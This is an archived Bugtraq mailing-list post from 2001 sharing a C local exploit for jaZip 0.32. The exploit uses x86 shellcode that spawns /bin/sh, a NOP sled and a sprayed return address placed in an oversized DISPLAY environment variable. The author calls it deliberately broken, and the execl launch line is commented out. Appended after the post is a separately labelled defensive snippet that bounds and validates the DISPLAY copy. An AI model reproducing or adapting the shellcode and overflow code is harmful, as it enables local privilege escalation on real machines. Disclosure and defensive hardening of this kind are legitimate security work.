jazip 0.32 local exploit
Date: Fri, 26 Jan 2001 01:05:42 -0000
From: n33dl3r <n33dl3r@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: jazip 0.32 local exploit
Hi folks!
In between heavy gaming I dished up this tiny exploit for jaZip!
Educational purposes only. Please don't abuuuse.
Hi mum, gimme some food damnit!
-- [snip - jazip-exp.c] --
/*
 * jaZip-0.32 local buffer overflow exploit (tested on debian)
 *
 * usage is: ./jazip-exp <offset> <align>
 * offset: 1500 x N (where N is positive or negative number)
 * align: 1-3 (0 is def.)
 *
 * This exploit is heavily broken, to prevent scriptkiddie abuse!
 * Thanks to d-blood for helping me with the shellcode.
 *
 * c0ded by: needler @ efnet <n33dl3r@hotmail.com>
 *
 * Oh btw.. fuck college, I'm gonna be a pro CS player.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* memset, memcpy, strlen */
#include <sys/types.h>  /* u_long */

#define BSIZE 2080      /* total length of the DISPLAY= value */
#define NOPS  1500      /* bytes of NOP sled placed before the shellcode */

char shellcode[] =
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

int
main(int argc, char **argv, char **envp) {
    char overflow[BSIZE];
    int i, align = 0, offset = 0;
    u_long addy = 0xbffff9e5;   /* return address, tuned with <offset> */

    if (argc > 1) offset = atoi(argv[1]);
    if (argc > 2) align = atoi(argv[2]);

    /* NOP sled, then shellcode, then the remainder filled with the address */
    memset(overflow, 0x90, BSIZE);
    memcpy(&overflow[NOPS], shellcode, strlen(shellcode));
    memcpy(overflow, "DISPLAY=", 8);
    for (i = (NOPS + strlen(shellcode)); i < BSIZE; i += 4)
        *(long *)&overflow[i + align] = addy + offset;

    /* the oversized DISPLAY variable becomes the first environment entry */
    envp[0] = overflow;
    printf("Using address 0x%lx\n", addy + offset);
    // execl("/usr/X11R6/bin/jazip", "jazip", NULL);
    return 0;
}
-- [snip - jazip-exp.c] --
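The post does not show jaZip's own code, so as an added illustration (not from the original post and not jaZip's source) here is the program-side fix for the bug class the exploit relies on: an environment value copied into a fixed stack buffer without a bound. The hardened copy below refuses a DISPLAY value shaped like the one jazip-exp.c builds; DISPLAY_MAX and the function names are assumptions.

```c
/* Constructed example, not jaZip's source: DISPLAY_MAX and the function
 * names are assumptions made for this illustration. */
#include <ctype.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

#define DISPLAY_MAX 256   /* assumed buffer size, not taken from jaZip */
/* The bug shape this exploit needs (assumed; the post shows no jaZip code)
 * is an unbounded copy of DISPLAY into a fixed stack buffer. This
 * replacement bounds the copy and checks the content. Returns 0 on
 * success, -1 if the value is missing, -2 if it does not fit with its
 * terminator, -3 if it holds bytes outside printable ASCII (a 0x90 NOP
 * sled or raw shellcode fails this even when it is short). */
int display_copy_safe(char *out, size_t outlen, const char *value)
{
    size_t len = 0;
    if (value == NULL)
        return -1;
    while (len < outlen && value[len] != '\0')
        len++;
    if (len == outlen)             /* no room for the NUL terminator */
        return -2;
    for (size_t i = 0; i < len; i++)
        if (!isprint((unsigned char)value[i]))
            return -3;
    memcpy(out, value, len + 1);
    return 0;
}

/* Validate into a local buffer of the assumed size and report the code. */
int check_display(const char *value)
{
    char out[DISPLAY_MAX];
    return display_copy_safe(out, sizeof out, value);
}

/* Feed a constructed stand-in for the exploit's payload (payload_len bytes
 * of 0x90, NUL-terminated) through the check and return its code. */
int check_nop_sled(size_t payload_len)
{
    char *payload = malloc(payload_len + 1);
    int rc;
    if (payload == NULL) return -99;
    memset(payload, 0x90, payload_len);
    payload[payload_len] = '\0';
    rc = check_display(payload);
    free(payload);
    return rc;
}
```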
Terrorists win! (damn I lub CS)
---
yours truly,
needler